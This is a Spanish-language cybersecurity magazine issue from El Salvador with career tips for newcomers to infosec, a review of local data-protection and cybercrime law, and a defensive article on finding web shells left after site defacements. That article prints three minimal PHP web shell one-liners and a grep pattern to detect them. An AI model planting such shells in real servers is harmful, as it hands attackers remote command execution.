Revista septiembre 2017 by NOISE Ciberseguridad

NOISE

REVISTA DE CIBERSEGURIDAD

Auditando nuestro servidor web

¿Por donde iniciar en InfoSec? Breve repaso de la Protección de Datos, Acceso a la Información y Delitos Informáticos en EL Salvador.

¿Comó saber si mi página es vulnerable a una inyección SQL?

CONTENIDO

¿Por dónde empezar en el tema de la Seguridad Informática? Breve repaso de la Protección de Datos, Acceso a la Información y Delitos Informáticos en EL Salvador

Auditando nuestro servidor web ¿Comó saber si mi página es vulnerable a una inyección SQL?

NOISE

REVISTA DE CIBERSEGURIDAD

EDITORIAL

Los años 2016 y 2017 se han caracterizado por ataques masivos a las infraestructuras web mundiales, y enfocadas a gobiernos. Por otro lado las empresas siguen creciendo en sus servicios web, el comercio electrónico, el Internet de las Cosas (IoT), es decir la tecnología no se detiene no importando el índice de cibercrimen. El Salvador no se queda atrás, las empresas han comenzado a invertir cada vez más en ampliar su infraestructura de servicios web, aplicaciones móviles, etc. Han surgido dos leyes de suma importancia, la ley de delitos informáticos y la ley de ﬁrma electrónica, y esperemos que muy pronto la ley de protección de datos y la de comercio electrónico. Sin embargo estas leyes son letra muerta sin evidencia, es decir si el delito no se puede comprobar por falta de evidencia entonces no existe delito. Como investigador forense les puedo decir que a diario la evidencia es contaminada por falta de conocimiento de la ley, por falta de controles, por no contar con una política de atención de incidentes.

De ahí que las empresas deben comenzar a incluir dentro de sus planes estratégicos,las capacitaciones en la ley, establecer la política de atención de incidentes, tener un asesor legal para poder establecer las bases de los delitos y poder judicializar de manera correcta. Y por último y no menos importante esperamos que el gobierno cree una política de ciber seguridad como país. Por Nelson chacon @noise503

Director General Nelson Chacón Reyes, CDFE Asesor en Gobierno de TI Mg. Leonardo Castillo, CISA Asesor en Auditoria de TI Héctor Jiménez,CSX Cuerpo Técnico Daniel Benavides Arte y Diseño Milagro Jiménez

NOISE REVISTA DE CIBERSEGURIDAD

Ciber Seguridad y la estrategia corporativa.

Deseo compartir unos consejos que me han ayudado a conocer y poder colaborar con la Comunidad Infosec de El Salvador. Muchas personas se preguntan ¿cómo puedo hacer para ingresar en el mundo del Infosec? Pues bien, esto del "Infosec" (abreviación para "Seguridad Informática" que se utilizará en adelante) está seccionado en dos partes: "la Comunidad" y "la Industria" del Infosec. ¿Podemos decir que existe algo como "Comunidad vrs. Industria"?. Claro que no, veamos esto desde el punto que la "Comunidad" Infosec puede conducir al campo de la "Industria". No es un decreto que todo el que se involucra en la Comunidad termine en el área de la Industria. Puede ser una decisión personal, mientras unos pueden dedicarse al Infosec como investigadores de seguridad independientes (Freelancer)

otros pueden optar por aceptar una oferta de una empresa para trabajar a tiempo completo o acomodar sus horarios y hacer una combinación entre ambas opciones. Por "Industria del Infosec" podemos referirnos a las personas que van a su trabajo para arreglar problemas de computadoras infectadas con software mal intencionado (malware), infectadas con software de extorsiones (ransomware), también los que van a tratar con clientes representando su empresa y muestran los distintos tipos de soluciones de seguridad disponibles ya sea en productos o servicios, etc. En cambio, la Comunidad Infosec eres tú y todos los que estamos intersados por la seguridad de los sistemas, entre ellos habemos quienes asistimos o participamos en talleres o charlas sobre Seguridad, los que disfrutamos de hacer escaneos de puertos 04

NOISE REVISTA DE CIBERSEGURIDAD

¿Por dónde empezar en el tema de la Seguridad Informática?

a otros equipos (de nuestra misma red!), otros que por hobby se dedican a abrir cerraduras con pinzas y ganzúas... bueno, todos los que de alguna manera nos seguimos involucrando en esta hermosa área de la seguridad de cualquier tipo de sistemas.

que recorrer y que también estos consejos pueden ayudar a muchos a iniciarse y venir a ser parte ya sea de la Comunidad, de la Industria o de ambas. Los siguientes consejos son para tener una idea como iniciar y mejorar el ambiente en la Comunidad o incluso para quienes ya se encuentran en la Industria saber dónde se encuentran personas muy talentosas para contratarlas y hasta en última instancia poder retener consigo esos talentos. Ambos caminos a pesar de tener distinto enfoque están de la mano. La Comunidad hace aumentar la Industria y la Industria hace aumentar la Comunidad. Veremos como funciona eso.

Las personas tienen distintas motivaciones para entrar en este mundo del Infosec. Unos ven esto como una montaña de oro y quieren escalar hasta el lugar donde está moviéndose el dinero por grandes cantidades, mientras que otros ven esto del Infosec sin mucha pretención y como su llamado nato en esta vida, una combinación perfecta entre sus temas de interés y sus habilidades. También están aquellas personas que han llegado allí de forma accidental, de un momento a otro escucharon "tú estarás a cargo de la Seguridad Informática de la empresa" y pues, no saben por donde empezar o qué camino seguir. Sin importar cómo se haya llegado o hacia donde se quiera llegar, lo más importante para cualquier inicio es dar el primer paso. Los siguientes tips/consejos sobre la Infosec que decidí tomar me han permitido darme cuenta que voy avanzado por buen camino, que aún hay distancia

14 consejos para empezar en la Comunidad Infosec.

Perfecto, puedes pensar "estoy leyendo esto porque no tengo experiencia y el primer consejo es tenerla". Bien, este es un punto como de espada de doble ﬁlo. Hay que saber que el Infosec es un campo muy, pero muy amplio y puede volverse muy profundo también. Un primer paso es tener "experiencia general". Digamos que, eres un fanático de tu equipo de entretenimiento en casa, donde tienes un equipos de sonido, un Smart-TV, reproductor de vídeo y todo esto lo tienes conectado a tu sistema de Internet inalámbrico y puedes hacer que todo esto

NOISE REVISTA DE CIBERSEGURIDAD

Tip #1: Tener experiencia.

trabaje armoniosamente en conjunto de una forma excepcional desde tu computadora, una Raspberry-Pi o desde tu teléfono. Pues bien, en la Infosec las cosas empiezan tomando algunas habilidades básicas que usualmente otros no tienen, por muy sencillas que sean. Supongamos que alguien sea para sus padres, familiares o amigos el primer técnico de soporte a quien ellos llaman cuando sucede algo raro con la computadora porque dan clic a un mensaje de correo electrónico que no debieron hacerlo y repentinamente aparece en pantalla un estridente fondo color rojo, un cronómetro en cuenta regresiva y un mensaje diciendo que debe depositar una módica cantidad de dinero en Bitcoins para tener las cosas nuevamente en su lugar... Bien, si puedes ayudarlos con ese tipo de tareas básicas además de conﬁgurar su impresora, actualizar o extender el tiempo de uso del antivirus, hacer funcionar un pedazo de hardware exótico con un driver antiguo, etc. Si comenzaste traveseando tu computadora, instalando algunos programas, desisntalando otros, probando nuevas conﬁguraciones sin haber leído el manual del fabricante y además de eso trasladas

ese tipo de inquietudes a tu smartphone, esos son los fundamentos que te llevarán a ser más efectivo cuando vengas a ser parte en algún tipo de industria del Infosec. Por otro lado, para quienes ya están en el campo de la Industria, escuchan que constantemente se habla de ingeniería inversa, IDS, IPS, Reglas del Firewall, etc., entonces, vienen a darse cuenta que todo esto de la Seguridad es un mundo muy complejo, como una pirámide invertida. Y eso está muy bien, porque es el punto donde vienen a darse cuenta que deben volverse especialistas en cosas especíﬁcas y mantener en constante construcción su base de conocimientos sobre Seguridad Informática para su crecimiento personal, profesional y hasta para compartir.

Tip #2: Toma el control de tu (auto-)

Aprende cosas nuevas. Debes tomar el control de tu auto-aprendizaje, en caso de no poder costear de momento una certiﬁcación, vuélvete un autodidacta. Hay quienes sólo pueden adaptarse a estar en un salón de clase con un instructor que los vaya guiando, está bien, es su forma en

NOISE REVISTA DE CIBERSEGURIDAD

aprendizaje.

particular de aprender. Pero también es magníﬁco que puedas hacerlo de forma auto-didáctica. ¿Qué tal un curso en Cybrary, Udemy, leer blogs, Wikis o videotutoriales en YouTube y aprender cosas de allí?

No importa si es de forma guiada por un instructor o de forma autodidacta, adquiere habilidades nuevas, trasládalas a tu entorno de trabajo y diles "miren que inseguros son nuestros sistemas", ciertamente estarás construyéndote una carrera.

Tip #3: Ingresa a un Grupo.

Cualquiera que sea el área en que desees incursionar, hay una gran variedad de recursos en línea que pueden ayudarte y muchísimos de ellos son gratuitos. ¿Han escuchado de YouTube? Dicen que es un sitio nuevo y muy cool en la red. Pues bien, solamente basta con preguntar en YouTube cómo atacar o prevenir ataques en determinado tipo de sistemas utilizando un lenguaje de scripting o PowerShell y habrán muchísimas sugerencias buenas. Vayamos por el lado de construir bases técnicas más especíﬁcas, si consultas en ese sitio "cómo programar en Python" te aseguro que obtendrás las mejores opciones. También, al resolver CTF's (Capture The Flag), es una forma fantástica de aprender, porque no se trata solamente de ver videos, leer blogs o wikis, sino de estar practicando de forma constante y así se va construyendo una nueva base de conocimientos en la que tú tienes el control

Estos sitios son apropiados para realizar conexiones y expandir tus contactos con gente como tú, con los mismos intereses particulares en la informática. Allí encontrarás a personas que puedan darte una ayuda cuando quieras dar el paso a tu siguiente trabajo, si neceesitas ayuda con un script de Python u otro lenguaje, si quieres iniciar un proyecto y no sabes qué hacer o por donde empezar, allí habrán personas para ayudarte a encontrar otros recursos o posiblemente para enseñarte.

NOISE REVISTA DE CIBERSEGURIDAD

Los Grupos donde se abordan temas de la Infosec son los lugares donde puedes conocer hackers y otras personalidades que también están interesadas en la misma temática que tú. Grupos como OWASP los hay por todos lados alrededor del mundo. También puedes ingresar a MeetUp y relacionarte con otros Grupos aﬁnes que tienen algo que compartir (https://www.meetup.com/topics/inform ation-security/).

Tip #4: Establécete metas.

No verás por siempre cosas que ya has aprendido o cosas que una persona en nivel inicial desea saber (qué es ping, TCP/IP, IPv4). Así que, sea desde una perspectiva de ingreso a la Comunidad o en la Industria, haz tiempo para ti mismo establece y alcanza tus metas.

Sabes hacia donde llegar cuando estableces metas. Como dijo Yogi Berra: "Si no sabes donde estás yendo, probablemente no llegarás allí". Esto viene a ser una parte importante en nuestra vida y en nuestro camino hacia el mundo del Infosec. Puede ser que no seas una persona que se ha sentado a pensar detenidamente para establece metas de aquí a 5 o 10 años, está bien, sinceramente yo tampoco. Pero nos podemos establecer metas a más corto plazo, por ejemplo aprender Administración básica de Sistemas GNU/Linux en una determinada cantidad de meses o escribir mi primer bash-script para X fecha. Y de esta forma, llevar uno mismo la cuenta y progreso durante los siguientes días. Debes hacer un ﬁrme compromiso e ir adelante y alcanzar esa meta. Una vez que la hayas alcanzado, hay que seguir adelante y establecer otra u otras metas. Si llevas un registro de tu avance serás capaz de darte cuenta cuántas cosas has aprendido y cuantas cosas habilidades has desarrollado.

Tip #5: Contribuye en Proyectos

Deﬁnitivamente eso está fuera de la realidad, porque existen proyectos donde solamente necesitas saber utilizar el block de notas o cualquier otro editor de texto. Échale un vistazo a estos proyectos:

Cuando te encuentres en la Industria del Infosec, este mismo consejo aplica para darte cuenta que siempre habrá una nueva habilidad que aprender, un nuevo vector de ataque por conocer, una técnica nueva que dominar, etc

https://github.com/WebBreacher/offensiveinterview -

Es una edición, adición o corrección de preguntas en una entrevista de Infosec.

NOISE REVISTA DE CIBERSEGURIDAD

OpenSource. Los proyectos OpenSource son muy importantes porque es tu oportunidad de devolver algo a la Comunidad, así también es una oportunidad de acercarte a la Industria. Esos proyectos que las personas están haciendo y publicando código en línea presentan muchas oportunidades. Podrías pensar en tirar la toalla y abandonar tus ideales porque no eres programador y no sabes escribir una sola línea de código y crees que no puedes participar en proyectos OpenSource.

Alguien puede pensar que no tiene nada sobre qué publicar, o no sabe sobre qué escribir. Un hacker muy reconocido, Carnal0wnage {Christ Gates}, ¿sabes lo que él dice? "no escribo para otras personas, escribo públicamente en mi blog porque es una forma de mantener notas personales", esto es porque cuando interactúas con diferentes Sistemas y realizas diferentes cosas tal vez en 2, 4, 8 meses o 2 años puedes decir ¡RAYOS! ¿No he hecho esto ya alguna vez?. Entonces, es el momento cuando regresas a tu blog y recoges la experienca que tuviste en ese momento y renuevas ideas, al mismo tiempo que ayudas a otros con lo que publicas. Sin mencionar cuando alguien escribe un comentario en una publicación que tu información le resultó de mucha ayuda.

https://github.com/fuzzdb-project/fuzzdb -

Se puede contribuir añadiendo usuarios, contraseñas, etc. Enriquecer estas listas con Notepad y git no es difícil. https://github.com/lockfale/OSINT-Framework -

Aquí puedes copiar y pegar otras direcciones web de utilidad y ya!. Esto es como un directorio o tus favoritos.

Tip #6: Asiste y participa en Conferencias de Infosec.

La clave está en la participación. Llegas, aprendes de otros y luego enseñas a otros. Al ﬁnal de las charlas de los expositores tómate un tiempo y platica con ellos, despeja tus dudas, ellos llegan para ayudarte a entender cosas que aún no conoces. Asistir a las conferencias es una oportunidad de oro para expandir tu círculo de contactos en la Comunidad Infosec, no con el propósito de hacer crecer tus redes sociales de uso general, sino con personas que comparten tus mismos intereses. Comparte también tus experiencias o inquietudes sobre algún proceso de aprendizaje y entre los expositores habrá alguien que te ayude a disolver las dudas que tengas.

Siguiendo una recomandación de Micah Hoffman, este es un blogpost muy impresionante de Lesley Carhart (@hacks4pancakes): https://goog.gl/ZzFRFp [https://tisiphone.net/2015/10/12/starting-an-infos ec-career-the-megamix-chapters-1-3/]

Tip #7: Crea un Blog.

Conviértete en un voluntario. ¿Para qué? Para conocer nuevas personas. En cada conferencia siempre hay muchas personas que colaboran para llevar a cabo ese tipo de eventos. La mayoría de ellos dan de su tiempo de una forma gratuita con el ﬁn de ayudar a la Comunidad y

NOISE REVISTA DE CIBERSEGURIDAD

#8: Voluntario

organizar eventos para todos nosotros. ¿No estás seguro como puedes ayudar? Responde al llamado de voluntarios que los organizadores de algunos eventos realizan, entre todas las actividades ellos pueden tener la actividad en la cual compartas de tu tiempo ayudando a que un evento se realice. Puede ser que no seas un experto socializando para una actividad relacionada a tratar con personas, pero puedes tener experiencia o ser bueno en aspectos técnicos como sonido, audiovisuales realizando cableado, etc. Mira la experiencia de ser voluntario como una oportunidad de aprendizaje y crecimiento en tu desarrollo profesional. En relación a este consejo, tengo un enlace de alguien que aprendió a programar en "sus 30's". El punto que quiero destacar de la publicación es que siendo voluntario en un proyecto le ayudó mucho y fue un plus en la experiencia profesional que se estaba formando:

Ya sea que se posea la oportunidad de recibir clases para una certiﬁcación con un instructor o que por medio de alguna red social tengas contacto con algún profesional del Infosec, solicita opiniones con el ﬁn de hacer una autoevaluación de las metas que te has puesto. No trates de vivir aislado mientras te encuentras en una fase de aprendizaje, es bueno recibir comentarios y darse cuenta si uno va avanzando por un camino correcto o si es que uno va avanzando.

Has comenzado a aprender algo, compártelo. Ya sea que te encuentres trabajando o empieces a aprender, aunque creas que no sabes mucho, comparte lo que aprendes. Aplícalo en tu trabajo si a eso te dedicas o con tus compañeros de colegio o universidad. Puedes sorprenderte a ti mismo cuando veas las estadísticas de las publicaciones de tu blog (Tip #7), por mínimas que sean, te darás cuenta que hay varias personas han visitado tus publicaciones. Aprovecho este punto para mezclar lo que hemos venido leyendo en los tips anteriores, una recomendación muy importante para el desempeño en el mundo del Infosec es que aprendas a comunicarte en el idioma Inglés, ya que es el idioma donde convergen las ideas de otros investigadores sin importar su lengua materna. Jobert Abma (@jobertabma), Co-Fundador de HackerOne [https://hackerone.com/hacktivity], me comentaba la diﬁcultad que a veces se

https://goo.gl/Efx1xf [https://medium.com/udacity/how-i-learned-t o-code-in-my-30s-61ad21180208]

Tip #9: Pedir y saber recibir comentarios/opiniones

NOISE REVISTA DE CIBERSEGURIDAD

Tip #10: Comparte el conocimiento.

Tip #11: Mide tu progreso.

se tiene entre la comunicación hacker ético - empresa, cuando un informe no es bien presentado y hay problemas para entender con claridad la vulnerabilidad que el hacker está reportando. Cada programa (Compañía) en sus lineamientos declara en qué idioma puede recibir reportes de vulnerabilidades. Sin embargo, en la mayoría de reportes el idioma común es el Inglés.

En fin, llegados a este número de consejos, éste te servirá para medir avances significativos. Si bien los conocimientos técnicos son una muestra de destreza en el Infosec, hay que aceptar que cuando seamos expertos en esta área de la Informática no estaremos aislados en una habitación y ser parte de la Comunidad o en una oficina por ser parte de la Industria, sino que tendremos que compartir opiniones con otros colegas y para llegar a ese punto, tenemos que medir nuestro avance. Un colgador de gafetes no es la única forma de medir avances. No importa si pones stickers en el calendario o lo coloreas para determinar una meta, lo importante es que no te quedes estático, midas tu desempeño y estar consciente de lo que vas avanzando.

Volviendo a la idea principal de este punto, si tienes cierto dominio del idioma Inglés u otro idioma, trata que el conocimiento que adquieras leyendo otros blogs o información que encuentres en algunas charlas en YouTube en otro(s) idioma(s) que conozcas, compartas ese conocimiento en tu lengua materna. Verás que hay otras personas que buscan esa misma información en tu idioma natal y es un modo de llevar anotaciones personales. De esta forma pones en práctica tus conocimientos de un idioma extranjero y estarás compartiendo conocimiento (no olvides solicitar permiso para publicar algo cuando no sea de tu propia experiencia).

NOISE REVISTA DE CIBERSEGURIDAD

Ante el consejo de establecer metas, debe ir acompañado un proceso de medición del progreso que puedas ir alcanzando. Micah Hoffman recomienda adquirir un objeto donde puedas colocar tus "badges" o gafetes de los eventos en que participes, sea como voluntario, expositor o asistente. En algunos lugares dan badges/gafetes por asistir, la Campus Party es uno de ellos.

Tip #12: Únete en Twitter.

@bugbountyforum, @BSidesDC, @Hacker0x01, @bugcrowd, así como los hashtags sugeridos: #infosec, #bugbounty. No hay un orden en especial y se me escapan muchísimos contactos más, pero al seguir estas cuentas tendrás una magníﬁca referencia sobre material técnico y también pueden seguir a las personas de quienes estos profesionales comparten su contenido.

No es mi deseo hacer que la red social de comunicación con 140 caracteres sufra una denegación de servicios de forma distribuida debido a la cantidad de personas que atenderán a este llamado, no, tampoco es hacerle publicidad, simplemente este consejo es debido a que muchos investigadores del Infosec y hackers éticos preﬁeren comunicar sus ideas a través de esta red social, porque después de LinkedIn esta es una forma magníﬁca de conectar personas con nuestros mismos intereses. No se trata de satisfacer un ego y ver cuantos seguidores tenemos y siguen lo que publicamos, sino de la elección de personas que tú decides seguir y que debido al contenido que comparten contribuirán a tu incursión y desarrollo en el Infosec. Entre mis recomendaciones de hackers éticos y profesionales del mundo del Infosec podría recomendar las siguientes cuentas: @webbreacher, @phwd, @jobertabma, @brutelogic, @bugbounty_world, @evanricafort, @knowledge_2014, @wcu35745, @ZephrFish, @zseano, @Jhaddix, @yaworsk, @disclosedh1,

listas y que te motiven en tu jornada del Infosec. Este consejo está relacionado con el tip anterior, desde el punto de vista que cuando te encuentres siendo parte de una comunidad virtual o mejor aún, te encuentres en la Industra del Infosec donde sólo tú seas el responsable del departamento, te encontrarás inmerso en el universo de Twitter leyendo el material que comparten a quienes estás siguiendo, pero para que no desperdicies tu tiempo de preparación (ﬁjando metas y midiendo tu progreso), procura seguir en Twitter a personas que te impulsen a alcanzar tus metas y te motiven. No se trata de una discriminación del resto, pero pon más atención sobre quienes comparten material relacionado a la Seguridad Informática, Pruebas de Concepto (PoC's), en lugar de los que publican lo que debería ser su vida privada o comparten cuanta foto le toman a sus mascotas. Dicha recomendación es por el enfoque que tienes para ingresar al mundo

NOISE REVISTA DE CIBERSEGURIDAD

Tip #13: Rodéate de personas que sean

del Infosec y deﬁnitivamente no tengo nada en contra de los animales o mascotas.

Tip #14: Date cuenta que eres único.

Este es un concepto un poco difícil de entender, ya que hay una gran variedad de personas en el ámbito de la Seguridad Informática o de las tecnologías de información. Unos entran a este mundo por hobby, les encanta jugar hasta destrozar su Raspberry-Pi, drones y aman hacer este tipo de cosas. Otros porque es parte de su trabajo y no tienen opción. Les gusta lo que hacen pero al llegar a casa juegan con los chicos, las mascotas, hacen deporte por muchas horas o un sin fin de actividades ajenas al Infosec viviendo su parte de la Seguridad Informática solamente en horarios de oficina, y pues eso también está bien, son personas necesarias en la Industria. Hay otros que están en el Infosec porque es lo que mejor se adapta a su estilo de vida, están inmersos en esto 24/7, en horarios fuera de oficina, tienen sus proyectos de OpenSource, piensan en esto en todo momento... constantemente se cuestionan cosas como ¿puedo introducirme en ese sistema?, ¿puedo crear ese exploit?, etc. Este tipo de mundo

Si alguien decide poner en práctica alguno o todos los consejos de este listado (no me reﬁero a que esto debe que ser tu checklist personal) y seguirlo en orden desde el primero hasta el último. Aunque sería impresionante si alguien lo hiciera y poder contar con esa persona en el siguiente evento de Infosec en la localidad o en otro país. Para alguien estos tips pueden ser una aventura (o una desventura), pero en lo que estoy seguro es que así como me están ayudando pueden ayudarte también a ti a colaborar con la Comunidad del Infosec o ayudar a alguien a iniciar en la Industria. Anímate, busca cómo ser un voluntario, escribe un blog, establece metas y mide tu progreso, ve y habla con alguien mas sobre Seguridad Informática, vuélvete un autodidacta, ingresa a un Grupo sobre Infosec de tu localidad, algún Capítulo OWASP de tu cercanía, por ejemplo.

NOISE REVISTA DE CIBERSEGURIDAD

del Infosec. La Comunidad del Infosec da la bienvenida a cualquier tipo de persona, porque cada quien con su personalidad, nivel de compromiso con sus metas, nivel de conocimientos, etc., puede encontrar la siguiente protección para un sistema o el siguiente vector de ataque que hasta el momento sea desconocido para cualquier AppleTV, Smart-TV, Smartphone o cualquier dispositivo del IoT.

. Comparte lo que aprendes y crece. El mundo de la Infosec tiene un gran déﬁcit de profesionales, comprométete y ven a ser parte de la Comunidad o de la Industria. Estos han sido los consejos de Micah Hoffman tomados y en parte adaptados por mi persona, los cuales no han sido enfocados en alguna parte técnica del Infosec en especíﬁco, porque aunque entre otras disciplinas me llaman la atención las vulnerabilidades Web, esta área de la Informática es tan amplia que sería imposible tratar cada aspecto con el cual las personas puedan sentirse motivadas o atraídas a seguir. A alguien podría gustarle el área de seguridad de redes, a otros la seguridad de sistemas Web, la seguridad de dispositivos móviles, la seguridad del Internet de las Cosas (IoT), a otros les interesaría el desarrollo de exploits, etc.

Entonces, al hacer recomendaciones individuales en lugar de ser esto un artículo podría escribirse un libro con miles de páginas para intentar cubrir cada opción con sus variantes y aún así quedaría incompleto. Este artículo está basado en la Charla "How to Join the Infosec Community" [https://goo.gl/YGKxxv] por Micah Hoffman @webbreacher - https://webbreacher.com

Habiedo obtenido su permiso lo he traducido y adaptado. En lo personal he tomado algunos de sus consejos y pues me han sido de mucha utilidad ya que a pesar de estar iniciando como muchos también lo harán me han ayudado a colaborar con la Comunidad en el pasado OWASP Latam Tour 2017 en El Salvador.

NOISE REVISTA DE CIBERSEGURIDAD

Gamliel Hernández Incursionador en el Infosec Participante en programas de Bug Bounty https://twitter.com/Gamliel_Infosec

En el año 2004 la Sala de lo Constitucional de la Corte Suprema de Justicia reconoció por primera vez en El Salvador el derecho a la protección de datos como un derecho fundamental de todos los salvadoreños (Amparo 118-2002 Solórzano vs DICOM), como la facultad de controlar el ﬂujo informático de nuestros datos para evitar abusos o usos indiscriminados. Luego, otra demanda venía en camino de parte de la Asociación Salvadoreña para la Protección de Datos e Internet (INDATA), una ONG sin ﬁnes de lucro, esta vez de

de carácter colectivo, es decir, a favor de todos los afectados, en contra de la empresa INFORNET, cuya casa matriz está radicada en Guatemala, con una sede en San Salvador, por mantener millones de perﬁles de salvadoreños sin el debido consentimiento para venta al mejor postor.En 2007 la Sala sentenció en

contra de dicha empresa por violar el derecho a la protección de datos o autodeterminación informativa de todos los salvadoreños cuyos datos recopilaba y vendía dicha empresa. (Amparo 934-2007, INDATA vs INFORNET).

NOISE REVISTA DE CIBERSEGURIDAD

Breve repaso de la Protección de Datos, Acceso a la Información y Delitos Informáticos en EL Salvador.

Nuevamente en el año 2012, INDATA por medio de su Presidente, el abogado Boris Solórzano, interpuso otra demanda de amparo colectivo ante la Sala en contra de DICOM-EQUIFAX por seguir recopilando y vendiendo datos personales sin el debido consentimiento, sin estar autorizada y sin aplicar mínimamente los principios que rigen el tratamiento de datos de carácter personal y comercial, sentenciando la Sala en Octubre de 2014 que dicha empresa violó el derecho constitucional antes referido.

Paralelo a tan importantes litigios estratégicos en El Salvador se aprobó el 2 de diciembre de 2010 la Ley de Acceso a la Información Pública (LAIP) en El Salvador, entrando en vigencia el 08 de mayo del año 2011, pero no fue hasta el 25 de febrero del año 2013, que empezó a funcionar el Instituto de Acceso a la Información Pública con 5 Comisionados elegidos. Dentro de los ﬁnes de la LAIP está la de proteger los datos personales en posesión de los entes obligados (Art. 3.h), no incluye a entes privados, y reconoce en su Art. 24 algunos de los principios generales de protección de datos tomados de la sentencia de amparo 118-2002.

NOISE REVISTA DE CIBERSEGURIDAD

El 26 de febrero del año 2016, la Asamblea Legislativa aprueba la LEY ESPECIAL CONTRA LOS DELITOS INFORMÁTICOS Y CONEXOS, teniendo ya más de un año de entrada en vigencia. No es momento de entrar a un análisis profundo de dicha ley, pero podríamos citar que algunas de las conductas ahí reconocidas podrían tener penas desproporcionadas para la gravedad mínima de una acción delictiva. Por ejemplo, quien sólo dé a conocer una contraseña ajena a otro, sería castigado con penas de entre 5 a 8 años de prisión, sin tomar en cuenta la gravedad y el daño ocasionado, que será tema de otro interesante articulo de opinion. Observemos que en 14 años de historia en El Salvador se ha logrado avanzar en la protección de datos, el acceso a la información pública y ahora se protegen los bienes de las conductas informáticas delictivas haciendo un mal uso de las tecnologías de la información y la comunicación. No signiﬁca que nuestra información y datos personales, ﬁnancieros o comerciales estén a salvo, desde luego que no, es mayor ahora el peligro, porque la facilidad de recopilar, acceder, vender o transferir nuestra información a terceros es sumamente fácil y accesible casi para cualquiera, aún las personas privadas de libertad tienen indebidamente acceso a la Internet, y podrían tener acceso a la compra y venta de bases de datos de toda naturaleza en El Salvador, no es un cuento, es una realidad latente, que en algunos casos se ha materializado en daños graves en la sociedad.

16 05

Desde luego son importantes los avances antes referidos, pero estamos lejos de tener una legislación completa que nos proteja de los ataques informáticos por medio de la Internet o que nuestra información personal, familiar y empresarial, este en resguardo de accesos indebidos. Importa mucho el nivel de conocimiento que pueda tener la sociedad de los peligros informáticos más básicos cometidos en la Internet, más que el uso del teléfono móvil es cada vez más grande, resulta imperioso tener un conocimiento más oportuno de dichos peligros que se renuevan con facilidad. El delito que más puede traer ganancias ilícitas a un delincuente es el robo de identidad que permite apoderarse de cuentas bancarias en línea de los desprevenidos usuarios o cuando la conﬁanza es mucha, se puede terminar sufriendo las consecuencias. En El Salvador las instituciones que velan por la protección de datos y la persecución del delito informático están dando sus primeros pasos, y lo poco o mucho que se hayan hecho, ya es otro gran avance en la prevención y castigo de tales conductas.

Por Boris Solórzano @borisruben Abogado Consultor en Protección de Datos, Seguridad de la Información y Cibercrimen. E-mail: slzbrs@gmail.com

NOISE REVISTA DE CIBERSEGURIDAD

Habría que esperar a ver resultados concretos en la protección de datos o castigo de los delincuentes informáticos, quienes pueden robar desde la comodidad de sus casas, por eso las técnicas informáticas utilizadas por las autoridades públicas que se encargan de dar ese servicio, deben de estar al día con las nuevas amenazas informáticos, aunque la falta de presupuesto y poca tecnicidad son dos grandes obstáculos, pero el esfuerzo se hace. Desde la parte privada existen muy contadas empresas salvadoreñas que se encargan de este rubro tecnologico, especialmente venden productos de prevención de ataques a las centralitas informáticas que pueda tener cada empresa, pero se requiere de una soﬁsticación más compleja más allá de vender productos, se necesita personal capacitado y certiﬁcado en la informática forense para poder llevar a la justicia a los responsables. En futuras publicaciones iremos profundizando en este tema para que la sociedad pueda estar más enterada de los peligros que representan el mal uso de la informática y cómo detectar y qué hacer ante ataques informáticos a sus sistemas.

Auditando nuestro servidor web En las últimas semanas nuestro equipo de trabajo ha estado levantando estadísticas de los sitios web que han sido vulnerados, clasiﬁcándolos de acuerdo a su dominio, y durante ese proceso nos hemos dado a la tarea de validar si los webadmin han detectado el problema y si han mitigado la vulnerabilidad, el resultado fue alarmante, el 80% de los casos el problema seguía latente, en el 30% de los casos la Prueba dejada por el atacante todavía seguía ahí.

un trozo de código que le permite al atacante ejecutar comandos en nuestro servidor a su antojo, en su forma más sencilla sería algo como esto: <?php system($_GET["cmd"]); ?>

El 100% de los casos fueron reportados como defacement en el sitio zone-h.org, sin embargo ¿cómo saber si han dejado algo más, en nuestro servidor? Por ejemplo un web Shell, lo cual dejaría vulnerable nuestro server a merced del atacante.Comencemos entendiendo que es un web Shell y como funciona, pues es

<?php Shell_exec($_POST["cmd"]); ?> <?php passthru ($_GET["cmd"]); ?>

NOISE REVISTA DE CIBERSEGURIDAD

Donde el código espera un parámetro y luego lo ejecuta, si el servidor no ha sido endurecido apropiadamente, el comando se ejecutara sin problemas, permitiendo al atacante realizar cualquier actividad que el usuario dueño del servicio web le permita. Otras variantes pueden ser:

Y existe una gran variedad de posibilidades, según cada programador, de lo simple a lo complejo, ahora bien todos ellos tendrán alguna de estas funciones, entonces ¿cómo saber si tengo alguno de estos web Shell en mi servidor? Si es un Linux podríamos realizar una búsqueda simple como la siguiente:

Ahora siempre es bueno pensar cómo prevenir los web Shell, acá un par de recomendaciones: 1. Genere una línea base de su servidor, Instala solo el software necesario y anota las versiones, Numero de archivos y tamaños por directorios, cantidad de usuarios y nombres. 2. Esto nos lleva a una buena gestión de cambios, esto nos podrá indicar cuando fueron agregados nuevos archivos, quien los modifico y la razón, podemos automatizar esto a través de procesos de auditoria de sistemas operativos o utilizando un FIM (File Integrity Manager), un SysLog, y un SIEM. 3. Sanitizar nuestros códigos de funciones como las mostradas, validar los archivos que se suben a nuestro sitio para garantizar que son lo que dicen ser, no simplemente validar la extensión del archivo. 4. Los directorios utilizados para la subida de archivos deberán ser colocados en zonas no ejecutables dentro de nuestro servidor web, es decir fuera de nuestro directorio www. 5. El usuario utilizado para ejecutar nuestros procesos web, no deben tener permisos administrativos. 6. Instalar un firewall local cerrando todos los puertos y solo permitiendo el tráfico deseado. 7. Adquirir/instalar un servicio automático de monitoreo sobre tu servidor web.

# grep -lir "shell_exec\|system\|passthru" /var/www/html/ Y este nos devolverá todos los archivos que en tu código usen esas funciones, ahí estarán webshell de atacantes que han dejado en nuestro directorio web o códigos que nuestros desarrolladores usen que deberían ser corregidos pues código que usen esas funciones pueden ser explotados por atacantes. Se deberá revisar cada archivo que haya sido listado por el comando. Debido a que los webshell pueden ser más complejos que los trozos de códigos mostrados en este artículo, se recomienda realizar una búsqueda más extensiva, por personal caliﬁcado para esta tarea, o utilizar una herramienta como un Shell detector https://github.com/emposha/PHP-Shell-Detector

NOISE REVISTA DE CIBERSEGURIDAD

Siempre es necesario validar cada archivo de manera manual para descartar los falsos positivos.

TUTORIAL

¿Comó saber si mi página es vulnerable a una inyección SQL? Por: Daniel Benavides

